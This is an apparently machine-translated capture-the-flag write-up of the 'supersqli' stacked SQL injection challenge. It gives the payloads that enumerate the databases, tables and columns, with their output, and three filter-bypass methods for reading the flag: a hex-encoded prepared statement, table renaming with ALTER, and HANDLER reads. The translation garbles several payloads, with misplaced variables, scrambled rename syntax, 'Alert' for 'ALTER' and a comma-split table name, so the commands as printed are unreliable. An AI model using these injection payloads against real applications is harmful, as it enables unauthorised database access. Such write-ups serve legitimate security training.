The main question investigated stack injection, as a relatively classic a question, in the spring and i GYCTF there have been upgraded version of the question
The guess here MySQL sentence structure should be:
select * from words where id='$inject';
Configured Payload: single quotes + semicolon closed previous statement, SQL insert statements, then the statement following the comment character can be commented
All databases are listed first:
1';show databases;#
get:
array(1) {
[0]=>
string(11) "ctftraining"
}
array(1) {
[0]=>
string(18) "information_schema"
}
array(1) {
[0]=>
string(5) "mysql"
}
array(1) {
[0]=>
string(18) "performance_schema"
}
array(1) {
[0]=>
string(9) "supersqli"
}
array(1) {
[0]=>
string(4) "test"
}
Select the database:
1';use supersqli;#
Supersqli query all the tables in the library:
1';show tables;#
get:
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
1919810931114514 query fields in the table (It should be noted that, if the table name is pure digital need anti-quoted wrap , or will not echo):
1';show columns from `1919810931114514`;#
get:
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
These are the normal procedure, but ready to use when the select query flag found a filter to filter out the select, update, delete, drop, insert, where:
Here are three ways to get began to explain the flag:
1. bypassed during storage (using prepare statement ):
. 1 ';
SeT 0x73656c656374202a2066726f6d20603139313938313039333131313435313460 @ = A; // here will be the hexadecimal code statement MySQL
prepare execsql from @a; // prepare is MySQL command statement defined above
execute execsql; #
About this bypassing can refer to: the SQL injection scenario under PDO Research
2. Rename the bypass ( using the alter statement to rename statement ):
. 1 ';
the rename table to words word1; // the name of the rename table for modifying
the rename table to 1,919,810,931,114,514 words;
ALTER table the Add words unsigned int Not Null AUTO_INCREMENT ID Primary Key; // ALTER modify fields in the table attributes
Alert table words change flag data varchar (100) ; #
After executing the access request again 1 'or 1 = 1 # can be obtained Flag
3.handler statement instead of a select query:
This method i upgraded version of the Spring and Autumn GYCTF in this question (multi-filtered prepare, set, rename, apparently the first two methods do not apply) in debut
1 '; handler `1919810931114514` open as ye; // Again, here is a table name because it is necessary to use pure digital anti-quotation marks wrapped
Handler YE the Read First;
Handler YE use Close; # // Note: This must be close handler can Gets Flag
Here attach the handler usage:
HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT ... ] HANDLER tbl_name CLOSE
eg: query the users table by the handler statement:
handler users open as yunensec; # Loading table designating data and returns a handle to rename
handler yunensec read first; # read the first line of the specified table / handle data
handler yunensec read next; # fetches the next row specified table / handle data
handler yunensec read next; # reads the next line of data specified table / handle
...
handler yunensec Close; # Close the handle